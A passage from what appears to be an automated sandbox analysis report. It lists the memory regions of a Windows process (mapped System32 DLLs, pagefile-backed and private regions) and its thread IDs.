0x7fefe221c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2400 start_va = 0x7fefe2c0000 end_va = 0x7fefe2defff entry_point = 0x7fefe2c60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2401 start_va = 0x7fefe2e0000 end_va = 0x7fefe3e8fff entry_point = 0x7fefe2e1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2402 start_va = 0x7fefe3f0000 end_va = 0x7fefe51cfff entry_point = 0x7fefe43ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2403 start_va = 0x7fefe520000 end_va = 0x7fefe5befff entry_point = 0x7fefe5225a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2404 start_va = 0x7fefe5d0000 end_va = 0x7fefe636fff entry_point = 0x7fefe5db03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2405 start_va = 0x7fefe640000 end_va = 0x7fefe64dfff entry_point = 0x7fefe641080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2406 start_va = 0x7fefe6d0000 end_va = 0x7fefe740fff entry_point = 0x7fefe6e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2407 start_va = 0x7fefe750000 end_va = 0x7feff4d7fff entry_point = 0x7fefe7ccebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2408 start_va = 0x7feff4f0000 end_va = 0x7feff4f0fff entry_point = 0x7feff4f0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2409 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2410 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 2411 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2412 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2413 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2414 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2415 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2416 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2417 start_va = 0x7fef5070000 end_va = 0x7fef515dfff entry_point = 0x7fef50712a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2418 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 2419 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 2420 start_va = 0x7fefbbf0000 end_va = 0x7fefbde3fff entry_point = 0x7fefbd7c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 2421 start_va = 0x120000 end_va = 0x121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 2422 start_va = 0x73b70000 end_va = 0x73b75fff entry_point = 0x73b71010 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 2423 start_va = 0x7fee1760000 end_va = 0x7fee1b50fff entry_point = 0x7fee1760000 region_type = mapped_file name = "mf.dll" filename = "\\Windows\\System32\\mf.dll" (normalized: "c:\\windows\\system32\\mf.dll") Region: id = 2424 start_va = 0x7fef3310000 end_va = 0x7fef337bfff entry_point = 0x7fef3310000 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 2425 start_va = 0x7fef7350000 end_va = 0x7fef73a6fff entry_point = 0x7fef7351118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 2426 start_va = 0x7fefae40000 end_va = 0x7fefae58fff entry_point = 0x7fefae411a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2427 start_va = 0x7fefb200000 end_va = 0x7fefb208fff entry_point = 0x7fefb201010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 2428 start_va = 0x7fefc2e0000 end_va = 0x7fefc2ebfff entry_point = 0x7fefc2e1064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2429 start_va = 0x7fefdb60000 end_va = 0x7fefdbacfff entry_point = 0x7fefdb61070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2430 start_va = 0x7fefe5c0000 end_va = 0x7fefe5c7fff entry_point = 0x7fefe5c1504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2431 start_va = 0x7fee3ce0000 end_va = 0x7fee3d4afff entry_point = 0x7fee3ce0000 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 2432 start_va = 0x7fefb4a0000 end_va = 0x7fefb5c9fff entry_point = 0x7fefb4a3810 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Thread: id = 157 os_tid = 0x234 Thread: id = 158 os_tid = 0x780 Thread: id = 159 os_tid = 0x528 Thread: id = 160 os_tid = 0x62c Thread: id = 161 os_tid = 0x6d4 Thread: id = 162 os_tid = 0x79c Thread: id = 163 os_tid = 0x7b4